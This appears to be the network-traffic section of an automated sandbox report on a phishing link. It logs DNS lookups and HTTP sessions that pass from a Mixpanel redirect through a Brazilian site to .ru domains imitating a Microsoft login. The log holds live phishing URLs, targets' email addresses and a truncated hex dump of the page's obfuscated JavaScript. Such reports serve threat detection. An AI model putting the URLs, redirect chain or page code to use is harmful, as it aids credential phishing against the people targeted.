                                                                                                    Jan 14, 2025 18:38:15.492386103 CET192.168.2.51.1.1.10x48ebStandard query (0)wctsp4dphdgnjff8epgl6frjohvlohcs9ulik1trbetu546zuxo.sprocubseq.ruA (IP address)IN (0x0001)false
                                                                                                    Jan 14, 2025 18:38:15.492460966 CET192.168.2.51.1.1.10x672Standard query (0)wctsp4dphdgnjff8epgl6frjohvlohcs9ulik1trbetu546zuxo.sprocubseq.ru65IN (0x0001)false
                                                                                                    Jan 14, 2025 18:38:16.554717064 CET192.168.2.51.1.1.10xb44fStandard query (0)www.office.comA (IP address)IN (0x0001)false
                                                                                                    Jan 14, 2025 18:38:16.554805994 CET192.168.2.51.1.1.10xf674Standard query (0)www.office.com65IN (0x0001)false
                                                                                                    Jan 14, 2025 18:38:18.540491104 CET192.168.2.51.1.1.10xf95cStandard query (0)www.office.comA (IP address)IN (0x0001)false
                                                                                                    Jan 14, 2025 18:38:18.540636063 CET192.168.2.51.1.1.10xf265Standard query (0)www.office.com65IN (0x0001)false
                                                                                                    Jan 14, 2025 18:38:19.492532015 CET192.168.2.51.1.1.10x5b1aStandard query (0)identity.nel.measure.office.netA (IP address)IN (0x0001)false
                                                                                                    Jan 14, 2025 18:38:19.492686987 CET192.168.2.51.1.1.10xbb5eStandard query (0)identity.nel.measure.office.net65IN (0x0001)false
                                                                                                    Jan 14, 2025 18:38:19.625113010 CET192.168.2.51.1.1.10x952dStandard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                                                                                    Jan 14, 2025 18:38:19.631254911 CET192.168.2.51.1.1.10x8770Standard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                    Jan 14, 2025 18:35:33.566488981 CET1.1.1.1192.168.2.50xb6e9No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.19A (IP address)IN (0x0001)false
                                                                                                    Jan 14, 2025 18:35:33.566488981 CET1.1.1.1192.168.2.50xb6e9No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.36A (IP address)IN (0x0001)false
                                                                                                    Jan 14, 2025 18:35:33.566488981 CET1.1.1.1192.168.2.50xb6e9No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.20A (IP address)IN (0x0001)false
                                                                                                    Jan 14, 2025 18:35:33.566488981 CET1.1.1.1192.168.2.50xb6e9No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.35A (IP address)IN (0x0001)false
                                                                                                    Jan 14, 2025 18:35:34.030448914 CET1.1.1.1192.168.2.50xf656No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                    Jan 14, 2025 18:35:47.353858948 CET1.1.1.1192.168.2.50xde6aNo error (0)api.mixpanel.com35.190.25.25A (IP address)IN (0x0001)false
                                                                                                    Jan 14, 2025 18:35:47.353858948 CET1.1.1.1192.168.2.50xde6aNo error (0)api.mixpanel.com130.211.34.183A (IP address)IN (0x0001)false
                                                                                                    Jan 14, 2025 18:35:47.353858948 CET1.1.1.1192.168.2.50xde6aNo error (0)api.mixpanel.com35.186.241.51A (IP address)IN (0x0001)false
                                                                                                    Jan 14, 2025 18:35:47.353858948 CET1.1.1.1192.168.2.50xde6aNo error (0)api.mixpanel.com107.178.240.159A (IP address)IN (0x0001)false
                                                                                                    Jan 14, 2025 18:35:48.442958117 CET1.1.1.1192.168.2.50xc8c4No error (0)midiacentral.com.br108.167.132.254A (IP address)IN (0x0001)false
                                                                                                    Jan 14, 2025 18:35:49.339301109 CET1.1.1.1192.168.2.50xd7d6No error (0)l4u8.yaalwgyl.ru172.67.186.162A (IP address)IN (0x0001)false
                                                                                                    Jan 14, 2025 18:35:49.339301109 CET1.1.1.1192.168.2.50xd7d6No error (0)l4u8.yaalwgyl.ru104.21.60.3A (IP address)IN (0x0001)false
                                                                                                    Jan 14, 2025 18:35:49.456058979 CET1.1.1.1192.168.2.50xa5d8No error (0)l4u8.yaalwgyl.ru65IN (0x0001)false
                                                                                                    Jan 14, 2025 18:35:50.378973961 CET1.1.1.1192.168.2.50x3970No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                    Jan 14, 2025 18:35:50.378973961 CET1.1.1.1192.168.2.50x3970No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                    Jan 14, 2025 18:35:50.378973961 CET1.1.1.1192.168.2.50x3970No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                    Jan 14, 2025 18:35:50.378973961 CET1.1.1.1192.168.2.50x3970No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                    Jan 14, 2025 18:35:50.380302906 CET1.1.1.1192.168.2.50xdec9No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                    Jan 14, 2025 18:35:50.380317926 CET1.1.1.1192.168.2.50xe492No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                    Jan 14, 2025 18:35:50.380317926 CET1.1.1.1192.168.2.50xe492No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                    Jan 14, 2025 18:35:50.381280899 CET1.1.1.1192.168.2.50x1d1No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                    Jan 14, 2025 18:35:50.381297112 CET1.1.1.1192.168.2.50xc0e1No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                    Jan 14, 2025 18:35:50.381297112 CET1.1.1.1192.168.2.50xc0e1No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                    Jan 14, 2025 18:35:50.422050953 CET1.1.1.1192.168.2.50x9f8aNo error (0)midiacentral.com.br108.167.132.254A (IP address)IN (0x0001)false
                                                                                                    Jan 14, 2025 18:35:51.083807945 CET1.1.1.1192.168.2.50x90c5No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                    Jan 14, 2025 18:35:51.083823919 CET1.1.1.1192.168.2.50xaa8cNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                    Jan 14, 2025 18:35:51.083823919 CET1.1.1.1192.168.2.50xaa8cNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                    Jan 14, 2025 18:35:51.189480066 CET1.1.1.1192.168.2.50xbe34No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                    Jan 14, 2025 18:35:51.189480066 CET1.1.1.1192.168.2.50xbe34No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                    Jan 14, 2025 18:35:51.189480066 CET1.1.1.1192.168.2.50xbe34No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                    Jan 14, 2025 18:35:51.189480066 CET1.1.1.1192.168.2.50xbe34No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                    Jan 14, 2025 18:35:51.642684937 CET1.1.1.1192.168.2.50x3848No error (0)www.google.com142.250.185.132A (IP address)IN (0x0001)false
                                                                                                    Jan 14, 2025 18:35:51.643258095 CET1.1.1.1192.168.2.50xe590No error (0)www.google.com65IN (0x0001)false
                                                                                                    Jan 14, 2025 18:35:51.980410099 CET1.1.1.1192.168.2.50x9f93No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                    Jan 14, 2025 18:35:51.980410099 CET1.1.1.1192.168.2.50x9f93No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                    Jan 14, 2025 18:35:51.981964111 CET1.1.1.1192.168.2.50xb7beNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                    Jan 14, 2025 18:35:52.126187086 CET1.1.1.1192.168.2.50x9839No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                    Jan 14, 2025 18:35:52.126187086 CET1.1.1.1192.168.2.50x9839No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                    Jan 14, 2025 18:35:52.126477957 CET1.1.1.1192.168.2.50x5aa8No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                    Jan 14, 2025 18:35:54.110502005 CET1.1.1.1192.168.2.50x8a65No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                                    Jan 14, 2025 18:38:14.335078001 CET1.1.1.1192.168.2.50xe0eNo error (0)wctsp4dphdgnjff8epgl6frjohvlohcs9ulik1trbetu546zuxo.sprocubseq.ru104.21.60.111A (IP address)IN (0x0001)false
                                                                                                    Jan 14, 2025 18:38:14.335078001 CET1.1.1.1192.168.2.50xe0eNo error (0)wctsp4dphdgnjff8epgl6frjohvlohcs9ulik1trbetu546zuxo.sprocubseq.ru172.67.195.229A (IP address)IN (0x0001)false
                                                                                                    Jan 14, 2025 18:38:14.391911030 CET1.1.1.1192.168.2.50x6e91No error (0)wctsp4dphdgnjff8epgl6frjohvlohcs9ulik1trbetu546zuxo.sprocubseq.ru65IN (0x0001)false
                                                                                                    Jan 14, 2025 18:38:15.484241962 CET1.1.1.1192.168.2.50x13efNo error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                                                    Jan 14, 2025 18:38:15.485532045 CET1.1.1.1192.168.2.50x3e63No error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                                                    Jan 14, 2025 18:38:15.632813931 CET1.1.1.1192.168.2.50x48ebNo error (0)wctsp4dphdgnjff8epgl6frjohvlohcs9ulik1trbetu546zuxo.sprocubseq.ru104.21.60.111A (IP address)IN (0x0001)false
                                                                                                    Jan 14, 2025 18:38:15.632813931 CET1.1.1.1192.168.2.50x48ebNo error (0)wctsp4dphdgnjff8epgl6frjohvlohcs9ulik1trbetu546zuxo.sprocubseq.ru172.67.195.229A (IP address)IN (0x0001)false
                                                                                                    Jan 14, 2025 18:38:15.647983074 CET1.1.1.1192.168.2.50x672No error (0)wctsp4dphdgnjff8epgl6frjohvlohcs9ulik1trbetu546zuxo.sprocubseq.ru65IN (0x0001)false
                                                                                                    Jan 14, 2025 18:38:16.563258886 CET1.1.1.1192.168.2.50xb44fNo error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                    Jan 14, 2025 18:38:16.563258886 CET1.1.1.1192.168.2.50xb44fNo error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                    Jan 14, 2025 18:38:16.599385977 CET1.1.1.1192.168.2.50xf674No error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                    Jan 14, 2025 18:38:16.599385977 CET1.1.1.1192.168.2.50xf674No error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                    Jan 14, 2025 18:38:17.664576054 CET1.1.1.1192.168.2.50x133eNo error (0)shed.dual-low.s-part-0016.t-0009.t-msedge.nets-part-0016.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                    Jan 14, 2025 18:38:17.664576054 CET1.1.1.1192.168.2.50x133eNo error (0)s-part-0016.t-0009.t-msedge.net13.107.246.44A (IP address)IN (0x0001)false
                                                                                                    Jan 14, 2025 18:38:18.515657902 CET1.1.1.1192.168.2.50x510fNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                    Jan 14, 2025 18:38:18.515657902 CET1.1.1.1192.168.2.50x510fNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                    Jan 14, 2025 18:38:18.547826052 CET1.1.1.1192.168.2.50xf265No error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                    Jan 14, 2025 18:38:18.547826052 CET1.1.1.1192.168.2.50xf265No error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                    Jan 14, 2025 18:38:18.547851086 CET1.1.1.1192.168.2.50xf95cNo error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                    Jan 14, 2025 18:38:18.547851086 CET1.1.1.1192.168.2.50xf95cNo error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                    Jan 14, 2025 18:38:19.499296904 CET1.1.1.1192.168.2.50xbb5eNo error (0)identity.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                    Jan 14, 2025 18:38:19.499635935 CET1.1.1.1192.168.2.50x5b1aNo error (0)identity.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                    Jan 14, 2025 18:38:19.632196903 CET1.1.1.1192.168.2.50x952dNo error (0)aadcdn.msftauth.netwww.tm.aadcdn.msftauth.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                    Jan 14, 2025 18:38:19.632196903 CET1.1.1.1192.168.2.50x952dNo error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                    Jan 14, 2025 18:38:19.632196903 CET1.1.1.1192.168.2.50x952dNo error (0)sni1gl.wpc.omegacdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                                    Jan 14, 2025 18:38:19.638277054 CET1.1.1.1192.168.2.50x8770No error (0)aadcdn.msftauth.netwww.tm.aadcdn.msftauth.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                    Jan 14, 2025 18:38:19.638277054 CET1.1.1.1192.168.2.50x8770No error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                    • api.mixpanel.com
                                                                                                    • midiacentral.com.br
                                                                                                    • https:
                                                                                                      • l4u8.yaalwgyl.ru
                                                                                                      • cdnjs.cloudflare.com
                                                                                                      • challenges.cloudflare.com
                                                                                                      • code.jquery.com
                                                                                                      • wctsp4dphdgnjff8epgl6frjohvlohcs9ulik1trbetu546zuxo.sprocubseq.ru
                                                                                                    • a.nel.cloudflare.com
                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    0192.168.2.55636335.190.25.254437980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-01-14 17:35:47 UTC1132OUTGET /track/?data=eyJldmVudCI6ImUtbWFpbDogW0FjdGlvbiBSZXF1aXJlZF0gUmVjb25uZWN0IEFkV29yZHMsIEZhY2Vib29rIHRvIFJvY2tlcmJveCAtIChjbGljaykiLCJwcm9wZXJ0aWVzIjp7InRva2VuIjoiYTQ4MzY4OTA0MTgzY2Y0MDVkZWI5MDg4MWUxNTRiZDgiLCJkaXN0aW5jdF9pZCI6ImxwcmlzZW5kb3JmQGphbmVpcmVkYWxlLmNvbSIsImxpbmsiOiJodHRwczpcL1wvYXBwLnJvY2tlcmJveC5jb20iLCJjYW1wYWlnbiI6InRyYW5zYWN0aW9uYWwifX0=&redirect=https%3A%2F%2Fmidiacentral.com.br%2Foslksedhlabd%2Fgyu%2Fwio%2Fblip%2Fsepla%2FGina/bWR1bm5AZ2VvaW5zaWdodHMuY29t HTTP/1.1
                                                                                                    Host: api.mixpanel.com
                                                                                                    Connection: keep-alive
                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                    Sec-Fetch-Site: none
                                                                                                    Sec-Fetch-Mode: navigate
                                                                                                    Sec-Fetch-User: ?1
                                                                                                    Sec-Fetch-Dest: document
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2025-01-14 17:35:48 UTC301INHTTP/1.1 302 Found
                                                                                                    Cache-Control: no-cache,no-store,must-revalidate
                                                                                                    Content-Type:
                                                                                                    Location: https://midiacentral.com.br/oslksedhlabd/gyu/wio/blip/sepla/Gina/bWR1bm5AZ2VvaW5zaWdodHMuY29t
                                                                                                    Date: Tue, 14 Jan 2025 17:35:48 GMT
                                                                                                    Content-Length: 0
                                                                                                    Via: 1.1 google
                                                                                                    Alt-Svc: clear
                                                                                                    Connection: close


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    1192.168.2.556375108.167.132.2544437980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-01-14 17:35:48 UTC727OUTGET /oslksedhlabd/gyu/wio/blip/sepla/Gina/bWR1bm5AZ2VvaW5zaWdodHMuY29t HTTP/1.1
                                                                                                    Host: midiacentral.com.br
                                                                                                    Connection: keep-alive
                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                    Sec-Fetch-Site: none
                                                                                                    Sec-Fetch-Mode: navigate
                                                                                                    Sec-Fetch-User: ?1
                                                                                                    Sec-Fetch-Dest: document
                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2025-01-14 17:35:49 UTC248INHTTP/1.1 200 OK
                                                                                                    Date: Tue, 14 Jan 2025 17:35:49 GMT
                                                                                                    Server: Apache
                                                                                                    refresh: 0;url=https://l4u8.yaalwgyl.ru/VDb0pu/#kmdunn@geoinsights.com
                                                                                                    Upgrade: h2,h2c
                                                                                                    Connection: Upgrade, close
                                                                                                    Content-Length: 0
                                                                                                    Content-Type: text/html; charset=UTF-8


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    2192.168.2.556381108.167.132.2544437980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-01-14 17:35:49 UTC659OUTGET /favicon.ico HTTP/1.1
                                                                                                    Host: midiacentral.com.br
                                                                                                    Connection: keep-alive
                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                    Sec-Fetch-Dest: image
                                                                                                    Referer: https://midiacentral.com.br/oslksedhlabd/gyu/wio/blip/sepla/Gina/bWR1bm5AZ2VvaW5zaWdodHMuY29t
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2025-01-14 17:35:49 UTC176INHTTP/1.1 200 OK
                                                                                                    Date: Tue, 14 Jan 2025 17:35:49 GMT
                                                                                                    Server: Apache
                                                                                                    Upgrade: h2,h2c
                                                                                                    Connection: Upgrade, close
                                                                                                    Content-Length: 0
                                                                                                    Content-Type: text/html; charset=UTF-8


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    3192.168.2.556382172.67.186.1624437980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-01-14 17:35:49 UTC691OUTGET /VDb0pu/ HTTP/1.1
                                                                                                    Host: l4u8.yaalwgyl.ru
                                                                                                    Connection: keep-alive
                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                    Sec-Fetch-Mode: navigate
                                                                                                    Sec-Fetch-Dest: document
                                                                                                    Referer: https://midiacentral.com.br/
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2025-01-14 17:35:50 UTC1238INHTTP/1.1 200 OK
                                                                                                    Date: Tue, 14 Jan 2025 17:35:50 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Cache-Control: no-cache, private
                                                                                                    cf-cache-status: DYNAMIC
                                                                                                    vary: accept-encoding
                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eEWntgpdtyteJ0OjJnDTKlj3Vc3qnbvm7XsEzdBMrVva2Md9yu8yfNy0%2BXaGMDjAlTgdaUooVpYGkQq59r5cJNlTXvO9jweqmEFW445pC3COnCHzVjvgHwIkx21sCw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=4399&min_rtt=4364&rtt_var=1292&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2823&recv_bytes=1594&delivery_rate=624698&cwnd=251&unsent_bytes=0&cid=a642f7d81f6d0f4a&ts=123&x=0"
                                                                                                    Set-Cookie: XSRF-TOKEN=eyJpdiI6IlhMZ0Fmc0d3T2M0SFJaV0IvZTdGUFE9PSIsInZhbHVlIjoiUy9TQ0gwZnlxZkNRellWVkdkcGpiSjd2eU5NUFhIT0g3ODFTMFRvYVF5V01DTldLdkJUZnNHaytFcGN3cmVaaXAxSnNZV0V3aTZKTHZON3BYMENVMms1Um9ScFFEUm5vUU5aUlpuV3c0WVQ1elRSY2lSMldLY2hISDNOTHpzMHciLCJtYWMiOiI4MDY5NTI3ZWIxZWUyYzk4ZGRhOGViZmU3NzY1MTY2MDQ4Y2M4YWI1MjIzYzE1YzFmM2FjMDU4MzI3M2MwZWUzIiwidGFnIjoiIn0%3D; expires=Tue, 14-Jan-2025 19:35:50 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                                                    2025-01-14 17:35:50 UTC732INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6c 64 31 4c 33 42 6f 55 6c 51 34 61 44 68 33 4d 6c 42 69 65 45 64 4f 4d 6b 64 34 4d 48 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 61 30 6b 35 62 48 56 6a 57 45 49 30 57 45 74 73 61 6e 70 79 5a 45 4a 33 57 45 70 48 4e 6b 74 51 5a 55 39 61 51 6e 64 31 62 45 38 32 59 58 68 59 54 6b 4e 4a 62 6e 64 73 65 57 68 59 5a 56 56 44 52 6a 64 47 52 45 35 69 55 7a 5a 49 5a 55 68 78 54 58 68 42 54 56 46 4d 4e 47 55 30 4c 7a 63 78 65 6b 31 74 56 56 42 30 4d 55 6c 72 61 47 68 75 57 56 52 42 65 6c 63 35 61 6c 6f 35 61 30 31 48 4d 58 70 78 54 6c 56 4f 4d 47 68 44 63 57 55 78 55 7a 42 52 63 45 31 32 64 6c 45 32 61 48 56 36 4e 55 56 32 51 6c 4e 34 54 44 59
                                                                                                    Data Ascii: Set-Cookie: laravel_session=eyJpdiI6Ild1L3BoUlQ4aDh3MlBieEdOMkd4MHc9PSIsInZhbHVlIjoia0k5bHVjWEI0WEtsanpyZEJ3WEpHNktQZU9aQnd1bE82YXhYTkNJbndseWhYZVVDRjdGRE5iUzZIZUhxTXhBTVFMNGU0Lzcxek1tVVB0MUlraGhuWVRBelc5alo5a01HMXpxTlVOMGhDcWUxUzBRcE12dlE2aHV6NUV2QlN4TDY
                                                                                                    2025-01-14 17:35:50 UTC1369INData Raw: 34 64 39 64 0d 0a 3c 21 2d 2d 20 53 75 63 63 65 73 73 20 69 73 20 67 65 74 74 69 6e 67 20 77 68 61 74 20 79 6f 75 20 77 61 6e 74 2c 20 68 61 70 70 69 6e 65 73 73 20 69 73 20 77 61 6e 74 69 6e 67 20 77 68 61 74 20 79 6f 75 20 67 65 74 2e 20 2d 2d 3e 0d 0a 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 2f 2a 20 49 74 20 61 6c 77 61 79 73 20 73 65 65 6d 73 20 69 6d 70 6f 73 73 69 62 6c 65 20 75 6e 74 69 6c 20 69 74 26 23 30 33 39 3b 73 20 64 6f 6e 65 2e 20 2a 2f 0d 0a 69 66 28 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 39 6e 4e 53 35 35 59 57 46 73 64 32 64 35 62 43 35 79 64 53 39 57 52 47 49 77 63 48 55 76 22 29 20 3d 3d 20 22 6e 6f 6d 61 74 63 68 22 29 7b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28
                                                                                                    Data Ascii: 4d9d... Success is getting what you want, happiness is wanting what you get. --><script>/* It always seems impossible until it&#039;s done. */if(atob("aHR0cHM6Ly9nNS55YWFsd2d5bC5ydS9WRGIwcHUv") == "nomatch"){document.write(decodeURIComponent(
                                                                                                    2025-01-14 17:35:50 UTC1369INData Raw: 56 46 78 57 69 42 77 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 4d 44 74 74 59 58 4a 6e 61 57 34 74 59 6d 39 30 64 47 39 74 4f 6a 46 79 5a 57 30 37 66 51 30 4b 49 32 68 78 63 30 35 78 55 32 46 52 63 56 6f 75 59 32 46 77 64 47 4e 6f 59 53 31 6a 62 32 35 30 59 57 6c 75 5a 58 4a 37 63 47 39 7a 61 58 52 70 62 32 34 36 49 48 4a 6c 62 47 46 30 61 58 5a 6c 4f 33 52 76 63 44 6f 67 4d 54 55 78 63 48 67 37 4c 79 70 33 61 57 52 30 61 44 6f 67 4d 54 41 77 4a 54 73 71 4c 33 42 68 5a 47 52 70 62 6d 63 74 63 6d 6c 6e 61 48 51 36 49 48 5a 68 63 69 67 74 4c 57 4a 7a 4c 57 64 31 64 48 52 6c 63 69 31 34 4c 43 41 75 4e 7a 56 79 5a 57 30 70 4f 33 42 68 5a 47 52 70 62 6d 63 74 62 47 56 6d 64 44 6f 67 64 6d 46 79 4b 43 30 74 59 6e 4d 74 5a 33 56 30 64 47 56 79 4c 58 67 73
                                                                                                    Data Ascii: VFxWiBwe21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOjFyZW07fQ0KI2hxc05xU2FRcVouY2FwdGNoYS1jb250YWluZXJ7cG9zaXRpb246IHJlbGF0aXZlO3RvcDogMTUxcHg7Lyp3aWR0aDogMTAwJTsqL3BhZGRpbmctcmlnaHQ6IHZhcigtLWJzLWd1dHRlci14LCAuNzVyZW0pO3BhZGRpbmctbGVmdDogdmFyKC0tYnMtZ3V0dGVyLXgs
